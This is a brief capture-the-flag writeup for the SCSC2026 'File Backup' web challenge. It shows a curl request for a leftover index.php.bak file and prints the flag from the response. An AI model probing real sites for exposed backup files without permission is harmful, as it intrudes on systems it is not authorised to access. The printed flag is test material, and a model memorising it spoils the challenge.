SCSC2026 Quals - File Backup - Web Exploitation Writeup

64 words

1 minute

SCSC2026 Quals - File Backup - Web Exploitation Writeup

2026-02-17

Writeup

CTF

/

Security

/

Web Exploitation

Category: Web Exploitation

URL: https://ctf.sriwijayasecuritysociety.com/

Flag: SCSC26{4h_1_f0rg3t_to_d3letE}

Challenge Description#

backup my index pls

Analysis#

Because there was no URL given for the challenge instance, I initially thought the target was the CTFd site itself. The hint “backup my index” strongly suggests a leftover backup file such as .bak, .old, or .swp.

Exploitation#

Access the backup file directly:

1
curl https://ctf.sriwijayasecuritysociety.com/index.php.bak

The response contained the flag directly inside the HTML:

1
<main role="main">
2
    <div class="container">
3
        <p>SCSC26{4h_1_f0rg3t_to_d3letE}</p>
4
    </div>
5
</main>

SCSC2026 Quals - File Backup - Web Exploitation Writeup

https://fuwari.vercel.app/posts/22/scsc2026-quals-file-backup-web-exploitation-writeup/

Author

Light

Published at

2026-02-17

License

CC BY-NC-SA 4.0

SCSC2026 Quals - Legacy HR Payroll - Web Exploitation Writeup

SCSC2026 Quals - Network Looking Glass - Web Exploitation Writeup

1

Challenge Description